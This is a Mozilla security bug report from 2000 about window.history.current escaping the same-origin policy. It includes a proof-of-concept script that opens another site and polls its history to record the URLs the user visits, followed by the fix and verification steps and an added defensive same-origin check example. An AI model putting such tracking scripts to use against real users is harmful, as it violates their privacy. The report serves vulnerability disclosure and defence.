Closed Bug 37905 Opened 24 years ago Closed 24 years ago

window.history.current allows tracking user's browsing

Categories

(Core :: Security, defect, P3)

x86
Windows NT
defect

VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: security-bugs)

Details

(Whiteboard: [nsbeta2+])

Attachments

(1 file)

Subject: BUG: window.history.current allows tracking user's browsing
Date: Tue, 02 May 2000 15:45:02 +0300
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

window.history.current is not protected by Same Origin security policy
and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
a=window.open("http://www.yahoo.com");
function checkStatus()
{
 current=a.history.current;
 if (current != "" && current != last) 
  {
    last = current;
    document.forms[0].elements[0].value += current + " ";
  }
}
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------


Reading links using window.history.current 
window.history.current is not protected by Same Origin security policy and that 
allows tracking user's surfing. 
Follow some links in www.yahoo.com and see them in the TEXTAREA below.
Attached file Test case
Need to double-check call to same-origin, check default policy. I think I can
take care of this one.
Target Milestone: --- → M16
Marking nsbeta2.
Status: NEW → ASSIGNED
Keywords: nsbeta2
Putting on [nsbeta2+] radar for beta2 fix. 
Whiteboard: [nsbeta2+]
Changed QA contact to Cathy.
QA Contact: junruh → czhang
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Yes, it is fixed.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
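
Added example, not part of the original bug report and not Mozilla's code: a minimal model of a property-access gate that applies a same-origin check and falls back to a restrictive default when the policy lookup fails, which is the kind of check this bug found missing for window.history.current. The policy table, the function names and the tester.example URL are assumptions made for illustration.

```javascript
"use strict";
// Added illustration, not Mozilla code; every name below is hypothetical.

// Constructed per-property policy table. Unlisted properties get the default.
const POLICY = new Map([
  ["history.current", "sameOrigin"],
  ["closed", "allAccess"],
]);
const DEFAULT_POLICY = "sameOrigin";

// Scheme + host + port, or null for unparsable URLs and opaque origins.
function originOf(href) {
  try {
    const origin = new URL(href).origin;
    return origin === "null" ? null : origin;
  } catch (e) {
    return null;
  }
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  return oa !== null && oa === originOf(b);
}

// lookup may throw (e.g. a policy store that cannot be read). The gate then
// falls back to DEFAULT_POLICY instead of skipping the check.
function canAccess(subjectUrl, objectUrl, property, lookup = (p) => POLICY.get(p)) {
  let policy;
  try {
    policy = lookup(property);
  } catch (e) {
    policy = undefined;
  }
  switch (policy || DEFAULT_POLICY) {
    case "allAccess":
      return true;
    case "sameOrigin":
      return sameOrigin(subjectUrl, objectUrl);
    default:
      return false; // "noAccess" and unrecognised values are denied
  }
}

// Constructed sample: the test page and the window it opened.
const openerUrl = "http://tester.example/test.html";
const openedUrl = "http://www.yahoo.com/";
console.log(canAccess(openerUrl, openedUrl, "history.current"));
console.log(canAccess(openedUrl, "http://www.yahoo.com/news", "history.current"));
```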